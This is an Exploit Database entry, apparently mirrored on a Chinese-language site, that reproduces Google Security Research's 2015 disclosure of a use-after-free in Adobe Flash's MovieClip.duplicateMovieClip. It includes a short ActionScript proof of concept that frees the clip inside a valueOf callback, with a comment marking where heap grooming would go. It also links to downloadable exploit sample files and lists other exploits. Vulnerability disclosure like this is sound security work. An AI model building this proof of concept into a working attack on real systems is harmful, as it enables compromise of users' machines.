Adobe Flash MovieClip.duplicateMovieClip – Use-After-Free

Exploit Database
12 阅读

作者： Google Security Research

日期： 2015-12-18
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/39042/

Source: https://code.google.com/p/google-security-research/issues/detail?id=591

There is a use-after-free in MovieClip.duplicateMovieClip. If the depth or movie name parameter provided is an object with toString or valueOf defined, this method can free the MovieClip, which is then used. 

A minimal PoC follows:


this.createEmptyMovieClip("mc", 1);

mc.duplicateMovieClip( "mc",{valueOf : func});


function func(){
	
	trace("in func");
	mc.removeMovieClip();

// Fix heap here

	return 5;
	
	}
	
	
A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39042.zip

last Exploits
Adobe Flash MovieClip.duplicateMovieClip – Use-After-Free的更多信息

HWiNFO 5.82-3410 – Denial of Service：
TECO AP-PCLINK 1.094 – ‘.tpc’ File Handling Buffer Overflow (PoC)：
Autodesk Backburner Manager 3 < 2016.0.0.2150 - Null Dereference Denial of Service：
Flash – PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution：
FreeBSD Kernel (FreeBSD 10.2 x64) – ‘sendmsg’ Kernel Heap Overflow (PoC)：
MyVideoConverter 2.15 – Local Denial of Service：
QEMU – NBD Server Long Export Name Stack Buffer Overflow：
no$gba 2.5c – ‘.nds’ Local crash：